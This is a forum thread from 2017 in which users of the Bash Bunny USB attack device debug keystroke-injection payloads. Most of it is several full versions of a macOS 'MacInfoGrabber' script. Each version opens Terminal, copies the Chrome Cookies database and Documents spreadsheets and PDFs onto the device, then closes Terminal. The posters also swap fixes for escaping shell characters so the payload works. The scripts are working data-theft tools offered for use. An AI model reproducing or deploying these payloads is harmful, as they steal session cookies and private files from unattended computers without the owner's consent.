anode Posted March 11, 2017 Share Posted March 11, 2017 (edited) For some reason when I quack a ~/ it is played back as /root/ ~/ works fine manually typed in a terminal I tried a simple just quack it into text editor and same results; /root/ MAC OSX 10.9 Mavericks. edit: Just tried on a Kali laptop same results. Both machine bare iron, not VMs. Edited March 11, 2017 by anode Quote Link to comment Share on other sites More sharing options...
LowValueTarget Posted March 11, 2017 Share Posted March 11, 2017 I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. Try putting your quack strings in a text file and using `QUACK keystrokes.txt` 1 Quote Link to comment Share on other sites More sharing options...
anode Posted March 11, 2017 Author Share Posted March 11, 2017 32 minutes ago, LowValueTarget said: I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. Try putting your quack strings in a text file and using `QUACK keystrokes.txt` Yup that was it. Saw another post, but it didn't sink in as to why. Makes sense now. Thanks! Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 11, 2017 Share Posted March 11, 2017 (edited) You can also just `\` escape symbols right in the QUACK directive. QUACK cd $HOME evaluates to cd /root whereas QUACK cd \$HOME literally types cd $HOME This also goes for ~ ; and | symbols. Check out what I mean in this practical example - https://github.com/hak5/bashbunny-payloads/pull/36 Edited March 11, 2017 by audibleblink code blocks 2 Quote Link to comment Share on other sites More sharing options...
Onus Posted March 13, 2017 Share Posted March 13, 2017 cd ENTER works too.. I was just playing around with the MacInfoGraber payload by : kmakblob and in order to get it to work I had to change it: Original: LED R ATTACKMODE HID STORAGE LOOTDIR=/loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 8000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 500 QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK GUI q QUACK DELAY 500 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"] then # Got spreadsheet files LED R B else LED R # No spread sheets fi Post Fiddles - I had to escape spaces and even the escape of the escape space as well as other special chars to get it to work.. didn't try escaping ~ LED R G 100 ATTACKMODE HID STORAGE LOOTDIR=loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 1000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 1000 QUACK STRING cd QUACK ENTER QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK DELAY 1000 QUACK ENTER QUACK STRING cd QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK STRING cd Documents QUACK ENTER QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/ #QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cd #QUACK GUI q QUACK DELAY 2000 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files if [ “$files” != “0”] then # Got files LED G else LED R # No files fi Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 13, 2017 Share Posted March 13, 2017 (edited) Submitted a PR to fix in mainline. - https://github.com/hak5/bashbunny-payloads/issues/51 Basic changes: - fixes lootdir path - dont capitalize var names that aren't exported - indentation - escape shell characters that are passed to QUACK - account for variable copy times by joining cp and exit commands - sync the disk LED G R ATTACKMODE HID STORAGE lootdir=loot/MacLoot mkdir -p /root/udisk/$LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx QUACK ENTER QUACK DELAY 500 QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal QUACK ENTER # Sync filesystem sync # Green LED for finished LED G Edited March 13, 2017 by audibleblink Quote Link to comment Share on other sites More sharing options...
Onus Posted March 13, 2017 Share Posted March 13, 2017 (edited) wow.. this is almost identical to the changes I have been making since my last comment... Awesome.. (high five) Is the lack of sync why I was never getting a success? If sync fixes this might be nice to add back in the logic for the led at the end indicating whether the files were found/copied.. Edited March 13, 2017 by Onus Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 13, 2017 Share Posted March 13, 2017 it's still in the github code, i only pasted changes here. Quote Link to comment Share on other sites More sharing options...
Onus Posted March 13, 2017 Share Posted March 13, 2017 Just now, audibleblink said: it's still in the github code, i only pasted changes here. I gathered that.. I mean the old file didn't sync the file system and always went LED red even when there were files, would this fix that Quote Link to comment Share on other sites More sharing options...
Onus Posted March 13, 2017 Share Posted March 13, 2017 I just tried removing the kill terminal command so that I can use the terminal to log $files and editing your script above to look like this after the sync call: # Sync filesystem sync files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files QUACK ENTER if [ $files != 0] then # Got files LED G else LED R # No files fi I am perplexed why $files keeps reading as 0 even though I have copied 16 files.. if I run the same line in terminal myself: ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l I get 16 but the script keeps returning 0 Its stupid bells and whistles.. but damn it I want to know. Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 13, 2017 Share Posted March 13, 2017 Is there a `files` folder in MacLoot? I thought it was just the xlsx folder and the cookies db Quote Link to comment Share on other sites More sharing options...
Onus Posted March 13, 2017 Share Posted March 13, 2017 Sorry.. on mine it's files.. I changed the name as im storing more than xls files.. but yes the folder exists and has files but $files keeps saying 0 Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 13, 2017 Share Posted March 13, 2017 I'm wondering if the /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload. Just a hypothesis, this is where my bash knowledge reaches its limits. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.